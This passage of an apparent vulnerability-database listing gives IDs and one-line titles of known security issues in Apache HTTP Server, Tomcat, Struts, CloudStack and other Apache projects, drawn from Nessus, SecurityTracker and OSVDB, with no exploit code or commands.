15078| [10839] PHP.EXE / Apache Win32 Arbitrary File Reading Vulnerability
15079| [10773] MacOS X Finder reveals contents of Apache Web files
15080| [10766] Apache UserDir Sensitive Information Disclosure
15081| [10756] MacOS X Finder reveals contents of Apache Web directories
15082| [10752] Apache Auth Module SQL Insertion Attack
15083| [10704] Apache Directory Listing
15084| [10678] Apache /server-info accessible
15085| [10677] Apache /server-status accessible
15086| [10440] Check for Apache Multiple / vulnerability
15087|
15088| SecurityTracker - https://www.securitytracker.com:
15089| [1028865] Apache Struts Bugs Permit Remote Code Execution and URL Redirection Attacks
15090| [1028864] Apache Struts Wildcard Matching and Expression Evaluation Bugs Let Remote Users Execute Arbitrary Code
15091| [1028824] Apache mod_dav_svn URI Processing Flaw Lets Remote Users Deny Service
15092| [1028823] Apache Unspecified Flaw in mod_session_dbd Has Unspecified Impact
15093| [1028724] (HP Issues Fix for HP-UX) Apache Web Server Bugs Permit Cross-Site Scripting and Information Disclosure Attacks
15094| [1028722] (Red Hat Issues Fix for JBoss) Apache Tomcat Lets Remote Users Conduct DIGEST Authentication Replay Attacks
15095| [1028693] (Red Hat Issues Fix) Apache Tomcat FORM Authenticator Lets Remote Users Conduct Session Fixation Attacks
15096| [1028622] Apache Struts 'includeParams' Bugs Permit Remote Command Execution and Cross-Site Scripting Attacks
15097| [1028621] Apache Subversion Bugs Let Remote Authenticated Users Execute Arbitrary Commands and Deny Service
15098| [1028540] Apache mod_rewrite Input Validation Flaw Lets Remote Users Execute Arbitrary Commands
15099| [1028534] Apache Tomcat FORM Authenticator Lets Remote Users Conduct Session Fixation Attacks
15100| [1028533] Apache Tomcat Lack of Chunked Transfer Encoding Extension Size Limit Lets Remote Users Deny Service
15101| [1028532] Apache Tomcat AsyncListeners Bug May Disclose Information from One Request to Another User
15102| [1028515] Apache VCL Input Validation Flaw Lets Remote Authenticated Users Gain Elevated Privileges
15103| [1028457] Apache ActiveMQ Bugs Let Remote Users Conduct Cross-Site Scripting Attacks, Deny Service, and Obtain Potentially Sensitive Information
15104| [1028287] Apache CXF WSS4JInInterceptor Grants Service Access to Remote Users
15105| [1028286] Apache CXF WS-Security UsernameToken Processing Flaw Lets Remote Users Bypass Authentication
15106| [1028252] Apache Commons FileUpload Unsafe Temporary File Lets Local Users Gain Elevated Privileges
15107| [1028207] Apache Input Validation Bugs Permit Cross-Site Scripting Attacks
15108| [1027836] Apache Tomcat Connection Processing Bug Lets Remote Users Deny Service
15109| [1027834] Apache Tomcat Bug Lets Remote Users Bypass Cross-Site Request Forgery Prevention Filter
15110| [1027833] Apache Tomcat Bug Lets Remote Users Bypass Security Constraints
15111| [1027729] Apache Tomcat Header Processing Bug Lets Remote Users Deny Service
15112| [1027728] Apache Tomcat Lets Remote Users Conduct DIGEST Authentication Replay Attacks
15113| [1027554] Apache CXF Lets Remote Authenticated Users Execute Unauthorized SOAP Actions
15114| [1027508] Apache Wicket Input Validation Flaw Permits Cross-Site Scripting Attacks
15115| [1027421] Apache Web Server Bugs Permit Cross-Site Scripting and Information Disclosure Attacks
15116| [1027096] Apache Commons Compress BZip2CompressorOutputStream() Sorting Algorithm Lets Remote or Local Users Deny Service
15117| [1026932] Apache LD_LIBRARY_PATH Processing Lets Local Users Gain Elevated Privileges
15118| [1026928] Apache OFBiz Unspecified Flaw Lets Remote Users Execute Arbitrary Code
15119| [1026927] Apache OFBiz Input Validation Flaws Permit Cross-Site Scripting Attacks
15120| [1026847] Apache Traffic Server Host Header Processing Flaw Lets Remote Users Deny Service
15121| [1026846] Apache Wicket Discloses Hidden Application Files to Remote Users
15122| [1026839] Apache Wicket Input Validation Flaw in 'wicket:pageMapName' Parameter Permits Cross-Site Scripting Attacks
15123| [1026616] Apache Bugs Let Remote Users Deny Service and Obtain Cookie Data
15124| [1026575] Apache Struts ParameterInterceptor() Flaw Lets Remote Users Execute Arbitrary Commands
15125| [1026484] Apache Struts Bug Lets Remote Users Overwrite Files and Execute Arbitrary Code
15126| [1026477] Apache Tomcat Hash Table Collision Bug Lets Remote Users Deny Service
15127| [1026402] Apache Struts Conversion Error Lets Remote Users Inject Arbitrary Commands
15128| [1026353] Apache mod_proxy/mod_rewrite Bug Lets Remote Users Access Internal Servers
15129| [1026295] Apache Tomcat Lets Untrusted Web Applications Gain Elevated Privileges
15130| [1026267] Apache .htaccess File Integer Overflow Lets Local Users Execute Arbitrary Code
15131| [1026144] Apache mod_proxy Pattern Matching Bug Lets Remote Users Access Internal Servers
15132| [1026095] Apache Tomcat HTTP DIGEST Authentication Weaknesses Let Remote Users Conduct Bypass Attacks
15133| [1026054] Apache mod_proxy_ajp HTTP Processing Error Lets Remote Users Deny Service
15134| [1025993] Apache Tomcat AJP Protocol Processing Bug Lets Remote Users Bypass Authentication or Obtain Information
15135| [1025976] Apache Wicket Input Validation Flaw Permits Cross-Site Scripting Attacks
15136| [1025960] Apache httpd Byterange Filter Processing Error Lets Remote Users Deny Service
15137| [1025925] Apache Tomcat Commons Daemon jsvc Lets Local Users Gain Elevated Privileges
15138| [1025924] Apache Tomcat XML Validation Flaw Lets Applications Obtain Potentially Sensitive Information
15139| [1025788] Apache Tomcat Lets Malicious Applications Obtain Information and Deny Service
15140| [1025755] Apache Santuario Buffer Overflow Lets Remote Users Deny Service
15141| [1025712] Apache Tomcat Discloses Passwords to Local Users in Certain Cases
15142| [1025577] Apache Archiva Input Validation Hole Permits Cross-Site Scripting Attacks
15143| [1025576] Apache Archiva Request Validation Flaw Permits Cross-Site Request Forgery Attacks
15144| [1025527] Apache APR Library apr_fnmatch() Flaw Lets Remote Users Execute Arbitrary Code
15145| [1025303] Apache Tomcat HTTP BIO Connector Error Discloses Information From Different Requests to Remote Users
15146| [1025215] Apache Tomcat May Ignore @ServletSecurity Annotation Protections
15147| [1025066] Apache Continuum Input Validation Flaw Permits Cross-Site Request Forgery Attacks
15148| [1025065] Apache Continuum Input Validation Hole Permits Cross-Site Scripting Attacks
15149| [1025027] Apache Tomcat maxHttpHeaderSize Parsing Error Lets Remote Users Deny Service
15150| [1025026] Apache Tomcat Manager Input Validation Hole Permits Cross-Site Scripting Attacks
15151| [1025025] Apache Tomcat Security Manager Lets Local Users Bypass File Permissions
15152| [1024764] Apache Tomcat Manager Input Validation Hole in 'sessionList.jsp' Permits Cross-Site Scripting Attacks
15153| [1024417] Apache Traffic Server Insufficient Randomization Lets Remote Users Poison the DNS Cache
15154| [1024332] Apache mod_cache and mod_dav Request Processing Flaw Lets Remote Users Deny Service
15155| [1024180] Apache Tomcat 'Transfer-Encoding' Header Processing Flaw Lets Remote Users Deny Service and Obtain Potentially Sensitive Information
15156| [1024096] Apache mod_proxy_http May Return Results for a Different Request
15157| [1023942] Apache mod_proxy_ajp Error Condition Lets Remote Users Deny Service
15158| [1023941] Apache ap_read_request() Memory Error May Let Remote Users Access Potentially Sensitive Information
15159| [1023778] Apache ActiveMQ Input Validation Flaw Permits Cross-Site Scripting Attacks
15160| [1023701] Apache mod_isapi Error Processing Flaw May Let Remote Users Deny Service
15161| [1023533] Apache mod_proxy Integer Overflow May Let Remote Users Execute Arbitrary Code
15162| [1022988] Apache Solaris Support Code Bug Lets Remote Users Deny Service
15163| [1022529] Apache mod_deflate Connection State Bug Lets Remote Users Deny Service
15164| [1022509] Apache mod_proxy stream_reqbody_cl() Infinite Loop Lets Remote Users Deny Service
15165| [1022296] Apache IncludesNoExec Options Restrictions Can Be Bypass By Local Users
15166| [1022264] Apache mod_proxy_ajp Bug May Disclose Another User's Response Data
15167| [1022001] Apache Tomcat mod_jk May Disclose Responses to the Wrong User
15168| [1021988] mod_perl Input Validation Flaw in Apache::Status and Apache2::Status Permits Cross-Site Scripting Attacks
15169| [1021350] NetWare Bug Lets Remote Users Access the ApacheAdmin Console
15170| [1020635] Apache Input Validation Hole in mod_proxy_ftp Permits Cross-Site Scripting Attacks
15171| [1020520] Oracle WebLogic Apache Connector Lets Remote Users Execute Arbitrary Code
15172| [1020267] Apache mod_proxy Interim Response Process Bug Lets Remote Users Deny Service
15173| [1019784] Apache-SSL Certificate Processing Bug May Let Remote Users View Portions of Kernel Memory
15174| [1019256] Apache mod_negotiation Input Validation Hole Permits Cross-Site Scripting Attacks
15175| [1019194] Apache Input Validation Hole in Mod_AutoIndex When the Character Set is Undefined May Permit Cross-Site Scripting Attacks
15176| [1019185] Apache Input Validation Hole in mod_proxy_ftp Permits Cross-Site Scripting Attacks
15177| [1019154] Apache Input Validation Hole in mod_status Permits Cross-Site Scripting Attacks
15178| [1019093] Apache Input Validation Hole in mod_imap Permits Cross-Site Scripting Attacks
15179| [1019030] Apache Input Validation Hole in Default HTTP 413 Error Page Permits Cross-Site Scripting Attacks
15180| [1018633] Apache mod_proxy Bug Lets Remote Users Deny Service
15181| [1018304] Apache HTTPD scoreboard Protection Flaw Lets Local Users Terminate Arbitrary Processes
15182| [1018303] Apache HTTPD mod_cache May Let Remote Users Deny Service
15183| [1018302] Apache mod_status Input Validation Hole Permits Cross-Site Scripting Attacks
15184| [1018269] Apache Tomcat Input Validation Hole in Processing Accept-Language Header Permits Cross-Site Scripting Attacks
15185| [1017904] Apache suEXEC Bugs May Let Local Users Gain Elevated Privileges
15186| [1017719] Apache Tomcat JK Web Server Connector Buffer Overflow in map_uri_to_worker() Lets Remote Users Execute Arbitrary Code
15187| [1017062] Apache mod_tcl Format String Bug in set_var() Function May Let Remote Users Execute Arbitrary Code
15188| [1016601] Apache mod_rewrite Off-by-one Error Lets Remote Users Execute Arbitrary Code
15189| [1016576] Apache Tomcat Discloses Directory Listings to Remote Users
15190| [1015447] Apache mod_ssl Null Pointer Dereference May Let Remote Users Deny Service
15191| [1015344] Apache mod_imap Input Validation Flaw in Referer Field Lets Remote Users Conduct Cross-Site Scripting Attacks
15192| [1015093] Apache Memory Leak in MPM 'worker.c' Code May Let Remote Users Deny Service
15193| [1014996] ApacheTop Unsafe Temporary File May Let Local Users Gain Elevated Privileges
15194| [1014833] Apache ssl_hook_Access() Function May Fail to Verify Client Certificates
15195| [1014826] Apache Memory Leak in 'byterange filter' Lets Remote Users Deny Service
15196| [1014575] Apache mod_ssl Off-by-one Buffer Overflow in Processing CRLs May Let Remote Users Deny Service
15197| [1014323] Apache Chunked Transfer-Encoding and Content-Length Processing Lets Remote Users Smuggle HTTP Requests
15198| [1013156] Apache mod_python Publisher Handler Discloses Information to Remote Users
15199| [1012829] Apache mod_auth_radius radcpy() Integer Overflow Lets Remote Users Deny Service in Certain Cases
15200| [1012416] Apache on Apple OS X Lets Remote Users Bypass Apache File Handlers and Directly Access Files
15201| [1012415] Apache on Apple HFS+ Filesystems May Disclose '.DS_Store' Files to Remote Users
15202| [1012414] Apache mod_digest_apple Lets Remote Users Replay Authentication Credentials
15203| [1012083] Apache Web Server Error in Processing Requests With Many Space Characters Lets Remote Users Deny Service
15204| [1011783] Apache mod_include Buffer Overflow Lets Local Users Execute Arbitrary Code
15205| [1011557] Apache mod_ssl SSLCipherSuite Directive Can By Bypassed in Certain Cases
15206| [1011385] Apache Satsify Directive Error May Let Remote Users Access Restricted Resources
15207| [1011340] Apache SSL Connection Abort State Error Lets Remote Users Deny Service
15208| [1011303] Apache ap_resolve_env() Buffer Overflow in Reading Configuration Files May Let Local Users Gain Elevated Privileges
15209| [1011299] Apache IPv6 Address Parsing Flaw May Let Remote Users Deny Service
15210| [1011248] Apache mod_dav LOCK Method Error May Let Remote Users Deny Service
15211| [1011213] Apache mod_ssl Can Be Crashed By Remote Users When Reverse Proxying SSL Connections
15212| [1010674] Apache Can Be Crashed By PHP Code Invoking Nested Remote Sockets
15213| [1010599] Apache httpd Header Line Memory Allocation Lets Remote Users Crash the Server
15214| [1010462] Apache mod_proxy Buffer Overflow May Let Remote Users Execute Arbitrary Code
15215| [1010322] Apache mod_ssl Stack Overflow in ssl_util_uuencode_binary() May Let Remote Users Execute Arbitrary Code
15216| [1010270] cPanel Apache mod_phpsuexec Options Let Local Users Gain Elevated Privileges
15217| [1009934] Apache Web Server Has Buffer Overflow in ebcdic2ascii() on Older Processor Architectures
15218| [1009516] Apache mod_survey HTML Report Format Lets Remote Users Conduct Cross-Site Scripting Attacks
15219| [1009509] Apache mod_disk_cache Stores Authentication Credentials on Disk
15220| [1009495] Apache Web Server Socket Starvation Flaw May Let Remote Users Deny Service
15221| [1009417] GroupWise WebAccess With Apache on NetWare Has Configuration Flaw That May Grant Web Access to Remote Users
15222| [1009338] Apache mod_access Parsing Flaw May Fail to Enforce Allow/Deny Rules
15223| [1009337] Apache mod_ssl Memory Leak Lets Remote Users Crash the Daemon
15224| [1009182] Apache for Cygwin '..%5C' Input Validation Flaw Discloses Files to Remote Users
15225| [1008973] PHP May Apply Incorrect php_admin_* Settings To Requests for Apache Virtual Hosts
15226| [1008967] Apache-SSL 'SSLFakeBasicAuth' Lets Remote Users Forge Client Certificates to Be Authenticated
15227| [1008920] Apache mod_digest May Validate Replayed Client Responses
15228| [1008828] Apache mod_python String Processing Bug Still Lets Remote Users Crash the Web Server
15229| [1008822] Apache mod_perl File Descriptor Leak May Let Local Users Hijack the http and https Services
15230| [1008675] mod_auth_shadow Apache Module Authenticates Expired Passwords
15231| [1008559] Apache mod_php File Descriptor Leak May Let Local Users Hijack the https Service
15232| [1008335] Apache mod_python String Processing Bug Lets Remote Users Crash the Web Server
15233| [1008196] Apache 2.x on Windows May Return Unexpected Files For URLs Ending With Certain Characters
15234| [1008030] Apache mod_rewrite Contains a Buffer Overflow
15235| [1008029] Apache mod_alias Contains a Buffer Overflow
15236| [1008028] Apache mod_cgid May Disclose CGI Output to Another Client
15237| [1007995] Apache Cocoon Forms May Let Remote Users Execute Arbitrary Java Code on the System
15238| [1007993] Apache Cocoon 'view-source' Sample Script Discloses Files to Remote Users
15239| [1007823] Apache Web Server mod_cgi Error May Let Malicious CGI Scripts Crash the Web Service
15240| [1007664] Apache::Gallery Unsafe Temporary Files May Let Local Users Gain Apache Web Server Privileges
15241| [1007557] Apache Web Server Does Not Filter Terminal Escape Sequences From Log Files
15242| [1007230] Apache HTTP Server 'rotatelogs' Bug on Win32 and OS/2 May Cause the Logging to Stop
15243| [1007146] Apache HTTP Server FTP Proxy Bug May Cause Denial of Service Conditions
15244| [1007145] Apache 'accept()' Errors May Cause Denial of Service Conditions
15245| [1007144] Apache Web Server 'type-map' File Error Permits Local Denial of Service Attacks
15246| [1007143] Apache 2.0 Web Server May Use a Weaker Encryption Implementation Than Specified in Some Cases
15247| [1006864] Apache Web Server Can Be Crashed By Remote Users Via mod_dav Flaws and Also Via Basic Authentication
15248| [1006709] Apache mod_survey Input Validation Flaw Lets Remote Users Fill Up Disk Space
15249| [1006614] Apache mod_ntlm Buffer Overflow and Format String Flaw Let Remote Users Execute Arbitary Code
15250| [1006591] Apache mod_access_referer Module Null Pointer Dereference May Faciliate Denial of Service Attacks
15251| [1006444] Apache 2.0 Web Server Line Feed Buffer Allocation Flaw Lets Remote Users Deny Service
15252| [1006021] Apache Tomcat Server URL Parsing Error May Disclose Otherwise Inaccessible Web Directory Listings and Files to Remote Users
15253| [1005963] Apache Web Server 2.x Windows Device Access Flaw Lets Remote Users Crash the Server or Possibly Execute Arbitrary Code
15254| [1005962] Apache Web Server Path Parsing Flaw May Allow Remote Users to Execute Code in Certain Configurations
15255| [1005848] Apache 'printenv' Script Input Validation Bugs in Older Versions May Let Remote Users Conduct Cross-Site Scripting Attacks
15256| [1005765] Apache mod_jk Module Processing Bug When Used With Tomcat May Disclose Information to Remote Users or Crash
15257| [1005548] Apache mod_php Module May Allow Local Users to Gain Control of the Web Port
15258| [1005499] Apache Web Server (2.0.42) May Disclose CGI Source Code to Remote Users When Used With WebDAV
15259| [1005410] Apache Tomcat Java Servlet Engine Can Be Crashed Via Multiple Requests for DOS Device Names
15260| [1005351] Apache Web Server (1.3.x) Shared Memory Scoreboard Bug Lets Certain Local Users Issue Signals With Root Privileges
15261| [1005331] Apache Web Server (2.x) SSI Server Signature Filtering Hole Lets Remote Users Conduct Cross-Site Scripting Attacks
15262| [1005290] Apache Tomcat Java Server Default Servlet Returns JSP Source Code to Remote Users
15263| [1005285] Apache Web Server 'mod_dav' Has Null Pointer Bug That May Allow Remote Users to Cause Denial of Service Conditions
15264| [1005010] Apache Web Server (2.0) Has Unspecified Flaw That Allows Remote Users to Obtain Sensitive Data and Cause Denial of Service Conditions
15265| [1004770] Apache 2.x Web Server ap_log_rerror() Function May Disclose Full Installation Path to Remote Users
15266| [1004745] Apache Tomcat Java Server Allows Cross-Site Scripting Attacks
15267| [1004636] Apache mod_ssl 'Off-by-One' Bug May Let Local Users Crash the Web Server or Possibly Execute Arbitrary Code
15268| [1004602] Apache Tomcat Java Server for Windows Can Be Crashed By Remote Users Sending Malicious Requests to Hang All Available Working Threads
15269| [1004586] Apache Tomcat Java Server May Disclose the Installation Path to Remote Users
15270| [1004555] Apache Web Server Chunked Encoding Flaw May Let Remote Users Execute Arbitrary Code on the Server
15271| [1004209] Apache 'mod_python' Python Language Interpreter Bug in Publisher Handler May Allow Remote Users to Modify Files on the System
15272| [1003874] Apache Web Server for Windows Has Batch File Processing Hole That Lets Remote Users Execute Commands on the System
15273| [1003767] 'mod_frontpage' Module for Apache Web Server Has Buffer Overlow in 'fpexec.c' That Allows Remote Users to Execute Arbitrary Code on the System with Root Privileges
15274| [1003723] Apache-SSL for Apache Web Server Has Buffer Overflow That Can Be Triggered By Remote Users
15275| [1003664] 'mod_ssl' Security Package for Apache Web Server Has Buffer Overflow That Can Be Triggered By Remote Users
15276| [1003602] GNUJSP Java Server Pages Implementation Discloses Web Files and Source Code to Remote Users and Bypasses Apache Access Control Restrictions
15277| [1003465] PHP for Apache Web Server May Disclose Installation Path Information to Remote Users Making 'OPTIONS' Requests
15278| [1003451] Oracle Application Server PL/SQL Module for Apache Has Buffer Overflows That Allow Remote Users to Execute Arbitrary Code and Gain Access to the Server
15279| [1003131] Apache Web Server in Virtual Hosting Mode Can Be Crashed By a Local User Removing a Log Directory
15280| [1003104] PHP.EXE Windows CGI for Apache Web Server May Let Remote Users View Files on the Server Due to Configuration Error
15281| [1003008] Apache 'mod_bf' Module Lets Remote Users Execute Arbitrary Code
15282| [1002629] Apache suEXEC Wrapper Fails to Observe Minimum Group ID Security Settings in Certain Situations
15283| [1002542] Apache Web Server Virtual Hosting Split-Logfile Function Lets Remote Users Write Log Entries to Arbitrary Files on the System
15284| [1002400] Apache mod_gzip Module Has Buffer Overflow That Can Be Exploited By Local Users to Gain Elevated Privileges
15285| [1002303] Several 3rd Party Apache Authentication Modules Allow Remote Users to Execute Arbitrary Code to Gain Access to the System or Execute Stored Procedures to Obtain Arbitrary Database Information
15286| [1002188] Apache Web Server Discloses Internal IP Addresses to Remote Users in Certain Configurations
15287| [1001989] Apache Web Server May Disclose Directory Contents Even If an Index.html File is Present in the Directory
15288| [1001719] Apache Web Server on Mac OS X Client Fails to Enforce File and Directory Access Protections, Giving Remote Users Access to Restricted Pages
15289| [1001572] Apache Web Server on Microsoft Windows Platforms Allows Remote Users to Crash the Web Server
15290| [1001304] Apache Web Server for Windows Lets Remote Users Crash the Web Server Application
15291| [1001083] Apache Web Server May Display Directory Index Listings Even if Directory Listings Are Disabled
15292|
15293| OSVDB - http://www.osvdb.org:
15294| [96078] Apache CloudStack Infrastructure Menu Setup Network Multiple Field XSS
15295| [96077] Apache CloudStack Global Settings Multiple Field XSS
15296| [96076] Apache CloudStack Instances Menu Display Name Field XSS
15297| [96075] Apache CloudStack Instances Menu Add Instances Network Name Field XSS
15298| [96074] Apache CloudStack Instances Menu Add Instances Review Step Multiple Field XSS
15299| [96031] Apache HTTP Server suEXEC Symlink Arbitrary File Access
15300| [95888] Apache Archiva Single / Double Quote Character Handling XSS Weakness
15301| [95885] Apache Subversion mod_dav_svn Module Crafted HTTP Request Handling Remote DoS
15302| [95706] Apache OpenOffice.org (OOo) OOXML Document File XML Element Handling Memory Corruption
15303| [95704] Apache OpenOffice.org (OOo) DOC File PLCF Data Handling Memory Corruption
15304| [95603] Apache Continuum web/util/GenerateRecipentNotifier.java recipient Parameter XSS
15305| [95602] Apache Continuum web/action/notifier/JabberProjectNotifierEditAction-jabberProjectNotifierSave-validation.xml Multiple Parameter XSS
15306| [95601] Apache Continuum web/action/notifier/JabberGroupNotifierEditAction-jabberProjectGroupNotifierSave-validation.xml Multiple Parameter XSS
15307| [95600] Apache Continuum web/action/ScheduleAction-saveSchedule-validation.xml Multiple Parameter XSS
15308| [95599] Apache Continuumweb/action/BuildDefinitionAction-saveBuildDefinition-validation.xml Multiple Parameter XSS
15309| [95598] Apache Continuum web/action/AddProjectAction-addProject-validation.xml Multiple Parameter XSS
15310| [95597] Apache Continuum web/action/ProjectEditAction-projectSave-validation.xml Multiple Parameter XSS
15311| [95596] Apache Continuum web/action/notifier/IrcGroupNotifierEditAction-ircProjectGroupNotifierSave-validation.xml Multiple Parameter XSS
15312| [95595] Apache Continuum web/action/notifier/IrcProjectNotifierEditAction-ircProjectNotifierSave-validation.xml Multiple Parameter XSS
15313| [95594] Apache Continuum web/action/ProjectGroupAction.java Multiple Parameter XSS
15314| [95593] Apache Continuum web/action/AddProjectGroupAction.java Multiple Parameter XSS
15315| [95592] Apache Continuum web/action/AddProjectAction.java Multiple Parameter XSS
15316| [95523] Apache OFBiz Webtools Application View Log Screen Unspecified XSS
15317| [95522] Apache OFBiz Nested Expression Evaluation Arbitrary UEL Function Execution
15318| [95521] Apache HTTP Server mod_session_dbd Session Saving Unspecified Issue
15319| [95498] Apache HTTP Server mod_dav.c Crafted MERGE Request Remote DoS
15320| [95406] Apache Struts DefaultActionMapper Multiple Prefixing Parameters Arbitrary Site Redirect
15321| [95405] Apache Struts DefaultActionMapper Multiple Prefixing Parameters Remote Code Execution
15322| [95011] Apache CXF XML Parser SOAP Message Handling CPU Resource Exhaustion Remote DoS
15323| [94705] Apache Geronimo RMI Classloader Exposure Serialized Object Handling Remote Code Execution
15324| [94651] Apache Santuario (XML Security for C++) XML Signature CanonicalizationMethod Parameter Spoofing Weakness
15325| [94636] Apache Continuum workingCopy.action userDirectory Traversal Arbitrary File Access
15326| [94635] Apache Maven SCM SvnCommandlineUtils Process Listing Local Password Disclosure
15327| [94632] Apache Maven Wagon SSH (wagon-ssh) Host Verification Failure MitM Weakness
| [94625] Apache Santuario (XML Security for C++) XML Signature Reference Crafted XPointer Expression Handling Heap Buffer Overflow
| [94618] Apache Archiva /archiva/security/useredit.action username Parameter XSS
| [94617] Apache Archiva /archiva/security/roleedit.action name Parameter XSS
| [94616] Apache Archiva /archiva/security/userlist!show.action roleName Parameter XSS
| [94615] Apache Archiva /archiva/deleteArtifact!doDelete.action groupId Parameter XSS
| [94614] Apache Archiva /archiva/admin/addLegacyArtifactPath!commit.action legacyArtifactPath.path Parameter XSS
| [94613] Apache Archiva /archiva/admin/addRepository.action Multiple Parameter XSS
| [94612] Apache Archiva /archiva/admin/editAppearance.action Multiple Parameter XSS
| [94611] Apache Archiva /archiva/admin/addLegacyArtifactPath.action Multiple Parameter XSS
| [94610] Apache Archiva /archiva/admin/addNetworkProxy.action Multiple Parameter XSS
| [94403] Apache Santuario (XML Security for C++) InclusiveNamespace PrefixList Processing Heap Overflow
| [94402] Apache Santuario (XML Security for C++) HMAC-based XML Signature Processing DoS
| [94401] Apache Santuario (XML Security for C++) XPointer Evaluation Stack Overflow
| [94400] Apache Santuario (XML Security for C++) HMAC-Based XML Signature Reference Element Validation Spoofing Weakness
| [94279] Apache Qpid CA Certificate Validation Bypass
| [94275] Apache Solr JettySolrRunner.java Can Not Find Error Message XSS
| [94233] Apache OpenJPA Object Deserialization Arbitrary Executable Creation
| [94042] Apache Axis JAX-WS Java Unspecified Exposure
| [93969] Apache Struts OGNL Expression Handling Double Evaluation Error Remote Command Execution
| [93796] Apache Subversion Filename Handling FSFS Repository Corruption Remote DoS
| [93795] Apache Subversion svnserve Server Aborted Connection Message Handling Remote DoS
| [93794] Apache Subversion contrib/hook-scripts/check-mime-type.pl svnlook Hyphenated argv Argument Handling Remote DoS
| [93793] Apache Subversion contrib/hook-scripts/svn-keyword-check.pl Filename Handling Remote Command Execution
| [93646] Apache Struts Crafted Parameter Arbitrary OGNL Code Execution
| [93645] Apache Struts URL / Anchor Tag includeParams Attribute Remote Command Execution
| [93636] Apache Pig Multiple Physical Operator Memory Exhaustion Remote Remote DoS
| [93635] Apache Wink DTD (Document Type Definition) Expansion Data Parsing Information Disclosure
| [93605] RT Apache::Session::File Session Replay Reuse Information Disclosure
| [93599] Apache Derby SYSCS_UTIL.SYSCS_SET_DATABASE_PROPERTY Boot Password Manipulation Re-encryption Failure Password Corruption
| [93555] Apache Commons Codec Invalid Base32 String Information Tunneling Weakness
| [93554] Apache HBase bulkLoadHFiles() Method ACL Bypass
| [93543] JBoss Enterprise Application Platform org.apache.catalina.connector.Response.encodeURL() Method MitM jsessionid Disclosure
| [93542] Apache ManifoldCF (Connectors Framework) org.apache.manifoldcf.crawler.ExportConfiguration Class Configuration Export Password Disclosure
| [93541] Apache Solr json.wrf Callback XSS
| [93524] Apache Hadoop GetSecurityDescriptorControl() Function Absolute Security Descriptor Handling NULL Descriptor Weakness
| [93521] Apache jUDDI Security API Token Session Persistence Weakness
| [93520] Apache CloudStack Default SSL Key Weakness
| [93519] Apache Shindig /ifr Cross-site Arbitrary Gadget Invocation
| [93518] Apache Solr /admin/analysis.jsp name Parameter XSS
| [93517] Apache CloudStack setup-cloud-management /etc/sudoers Modification Local Privilege Escalation
| [93516] Apache CXF UsernameTokenInterceptor Nonce Caching Replay Weakness
| [93515] Apache HBase table.jsp name Parameter XSS
| [93514] Apache CloudStack Management Server Unauthenticated Remote JMX Connection Default Setting Weakness
| [93463] Apache Struts EL / OGNL Interpretation Unspecified Remote Code Execution
| [93462] Apache CXF WS-SecurityPolicy AlgorithmSuite Arbitrary Ciphertext Decryption Weakness
| [93401] Apache Hadoop core-site.xml Permission Weakness Local Alfredo Secret Disclosure
| [93400] Apache Hadoop Map/Reduce Job Log Directory Symlink Arbitrary File Mode Manipulation
| [93397] Apache Wicket Referrer HTTP Header Session ID Disclosure
| [93366] Apache HTTP Server modules/mappers/mod_rewrite.c do_rewritelog() Function Log File Terminal Escape Sequence Filtering Remote Command Execution
| [93254] Apache Tomcat AsyncListener Method Cross-session Information Disclosure
| [93253] Apache Tomcat Chunked Transfer Encoding Data Saturation Remote DoS
| [93252] Apache Tomcat FORM Authenticator Session Fixation
| [93172] Apache Camel camel/endpoints/ Endpoint XSS
| [93171] Apache Sling HtmlResponse Error Message XSS
| [93170] Apache Directory DelegatingAuthenticator MitM Spoofing Weakness
| [93169] Apache Wave AuthenticationServlet.java Session Fixation Weakness
| [93168] Apache Click ErrorReport.java id Parameter XSS
| [93167] Apache ActiveMQ JMSXUserId Spoofing Weakness
| [93166] Apache CXF Crafted Message Element Count Handling System Resource Exhaustion Remote DoS
| [93165] Apache CXF Crafted Message Element Level Handling System Resource Exhaustion Remote DoS
| [93164] Apache Harmony DatagramSocket Class connect Method CheckAccept() IP Blacklist Bypass
| [93163] Apache Hadoop Map/Reduce Daemon Symlink Arbitrary File Overwrite
| [93162] Apache VelocityStruts struts/ErrorsTool.getMsgs Error Message XSS
| [93161] Apache CouchDB Rewriter VM Atom Table Memory Exhaustion Remote DoS
| [93158] Apache Wicket BookmarkablePageLink Feature XSS CSRF
| [93157] Apache Struts UrlHelper.java s:url includeParams Functionality XSS
| [93156] Apache Tapestry Calendar Component datefield.js datefield Parameter XSS
| [93155] Apache Struts fielderror.ftl fielderror Parameter Error Message XSS
| [93154] Apache JSPWiki Edit.jsp createPages WikiPermission Bypass
| [93153] Apache PDFBox PDFXrefStreamParser Missing Element Handling PDF Parsing DoS
| [93152] Apache Hadoop HttpServer.java Multiple Function XSS
| [93151] Apache Shiro Search Filter userName Parameter LDAP Code Injection Weakness
| [93150] Apache Harmony java.net.SocketPermission Class boolean equals Function checkConnect() Weakness Host Name Retrieval
| [93149] Apache Harmony java.security.Provider Class void load Function checkSecurityAccess() Weakness
| [93148] Apache Harmony java.security.ProtectionDomain Class java.lang.String.toString() Function checkPermission() Weakness
| [93147] Apache Harmony java.net.URLConnection openConnection Function checkConnect Weakness Proxy Connection Permission Bypass
| [93146] Apache Harmony java.net.ServerSocket Class void implAccept Function checkAccept() Weakness SerSocket Subclass Creation
| [93145] Apache Qpid JMS Client Detached Session Frame Handling NULL Pointer Dereference Remote DoS
| [93144] Apache Solr Admin Command Execution CSRF
| [93009] Apache VCL XMLRPC API Unspecified Function Remote Privilege Escalation
| [93008] Apache VCL Web GUI Unspecified Remote Privilege Escalation
| [92997] Apache Commons Codec org.apache.commons.codec.net.URLCodec Fields Missing 'final' Thread-safety Unspecified Issue
| [92976] Apache ActiveMQ scheduled.jsp crontab Command XSS
| [92947] Apache Commons Codec org.apache.commons.codec.language.Soundex.US_ENGLISH_MAPPING Missing MS_PKGPROTECT Field Manipulation Unspecified Issue
| [92749] Apache CloudStack Predictable Hash Virtual Machine Console Console Access URL Generation
| [92748] Apache CloudStack VM Console Access Restriction Bypass
| [92709] Apache ActiveMQ Web Console Unauthenticated Remote Access
| [92708] Apache ActiveMQ Sample Web Application Broker Resource Consumption Remote DoS
| [92707] Apache ActiveMQ webapp/websocket/chat.js Subscribe Message XSS
| [92706] Apache ActiveMQ Debug Log Rendering XSS
| [92705] Apache ActiveMQ PortfolioPublishServlet.java refresh Parameter XSS
| [92270] Apache Tomcat Unspecified CSRF
| [92094] Apache Subversion mod_dav_svn Module Nonexistent URL Lock Request Handling NULL Pointer Dereference Remote DoS
| [92093] Apache Subversion mod_dav_svn Module Activity URL PROPFIND Request Handling NULL Pointer Dereference Remote DoS
